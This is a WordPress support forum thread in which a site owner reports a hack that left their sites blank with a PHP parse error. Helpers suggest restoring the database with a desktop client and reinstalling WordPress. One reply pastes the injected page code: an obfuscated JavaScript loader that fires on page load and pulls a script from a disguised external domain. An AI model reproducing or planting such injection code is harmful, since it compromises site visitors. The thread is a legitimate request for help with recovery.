Hacked – Latest Version

  • I have 4 web sites, 2 of which run on WordPress. Both of these WordPress run sites have been hacked rendering them blank with the following error code visible to all visitors: Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1034

    I haven’t edited any files nor have I added anything to my widgets in order to create this error.

    I have a back up facility and have tried restoring my site from the sql but its 4.5MB large and just crashes my browser. What am I supposed to do now? My site didn’t have loads of information on it so the sql shouldn’t be that large.

    Here is an example of some of the sql from my last backup (a few days ago) I don’t think those !40101 characters should be there:

    — Table structure for table wp_yak_product

    DROP TABLE IF EXISTS wp_yak_product;
    /*!40101 SET @saved_cs_client = @@character_set_client */;
    /*!40101 SET character_set_client = utf8 */;
    CREATE TABLE wp_yak_product (
    post_id mediumint(9) NOT NULL,
    product_code varchar(30) default NULL,
    price float NOT NULL,
    alt_title varchar(255) default NULL,
    PRIMARY KEY (post_id)
    ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
    /*!40101 SET character_set_client = @saved_cs_client */;


    — Dumping data for table wp_yak_product

    LOCK TABLES wp_yak_product WRITE;
    /*!40000 ALTER TABLE wp_yak_product DISABLE KEYS */;
    INSERT INTO wp_yak_product VALUES (28,NULL,200,’Something Something Earrings’);
    /*!40000 ALTER TABLE wp_yak_product ENABLE KEYS */;
    UNLOCK TABLES;


    — Table structure for table wp_yak_product_detail

Viewing 7 replies - 1 through 7 (of 7 total)

  • Hello,

    The yak_product_detail table is not a default table in wordpress, but might be associated with a plugin.

    Your best bet is to try and restore your sql backup using a mysql client, rather than the browser.

    Try mysqlyog or navicat. Log into your database using one of these programmes (or similar). Then I’d take another backup of what it online, then delete it and restore from one of your previous backups.

    Which version of wordpress are you currently using, it might be an idea to update it?

    Hope it helps.

    Ian.

    The yak_product tables are from YAK Shopping cart plugin, so nothing to worry about.
    https://www.ads-software.com/extend/plugins/yak-for-wordpress/

    Your database file might be big due to wordpress saving any revisions to posts/pages?

    Ian.

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    ?????? Advisor and Activist

    Re-apply the latest WP. Download and update all your PHP files.

    Parse error: syntax error, unexpected ‘<‘ in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1034

    It may just be a file corruption, but that doesn’t look like a hack I’m familiar with.

    Thread Starter Pink Garden

    (@pinkgarden)

    Hi guys

    Sorry, I should have explained, I know that YAK is a plugin, it’s was one I installed ages ago but don’t use anymore. I’m not suggesting in any way thats the hack, its just a snippet taken from my sql. It’s the ominous *!40101 that I think shouldn’t be there.

    I know that I have been hacked as when I load up my site, in the status bar of my browser it says waiting for my web address then some other random address that I am not associated with (streamate-com.51.com….)

    If I look at the source code of my site as it is, it looks like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var T3v0598u1n9ba = document.createElement(‘script’);T3v0598u1n9ba.setAttribute(‘type’, ‘text/javascript’);T3v0598u1n9ba.setAttribute(‘id’, ‘myscript1’);T3v0598u1n9ba.setAttribute(‘src’, ‘h#&t##t@&&p#)@#:@@/$(&/)!s@$!t(#r&&&e^)a#!@^m(a@@(t@)e$-!@c&o)#m)!.#)^&5)((1)@.$c@#o@#&m^@.!(!!w)^$o&^r)$l$@@d@&^o)^$&f(@^)w$^a)(r#)!c&r!^#a#f(t@$&-$##c##&^o#@@!m&)^!.$^!b($o($(a(&r!#d#^s@#^a^$w^.(&^$r)(u^@@^:((8$&0!&^8))0^!/&!(m!$$e&(d&^i&a(&(&f(#^i&^!)r()#$e^)^.(@c!o#^##$m#^/$(#(m^!e$)d)&i&&a$$&&#f#@i@&r!@e@@.!!c!##@^o!m&/$!!i#!n@$d)(e$#e^#^d(!&.^c(o$@^m$^/!)@a@)!)#m((^$a!z(()o@n#(&.&&)(c&^^o^!.##u&@k$/#$&!g$))(o)o&^&g^)^l$#^&)e)#.)&&@$c)#o($m(@)#/(@)’.replace(/&|\(|\!|\^|@|#|\)|\$/ig, ”));T3v0598u1n9ba.setAttribute(‘defer’, ‘defer’);document.body.appendChild(T3v0598u1n9ba);}} catch(e) {}</script>
    <b>Parse error</b>: syntax error, unexpected ‘<‘ in <b>/home/pinkgar1/public_html/wp-includes/default-widgets.php</b> on line <b>1034</b>

    I was using the most up to date version at the time before my site got hacked 2.8.5

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    ?????? Advisor and Activist

    Start at the beginning then: https://codex.www.ads-software.com/FAQ_My_site_was_hacked

    It’s the ominous *!40101 that I think shouldn’t be there.

    Don’t worry about that. It’s a line that’s often present in perfectly valid sql dumps.

    If you have that backup locally on your pc, try zipping it and then uploading it.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Hacked – Latest Version’ is closed to new replies.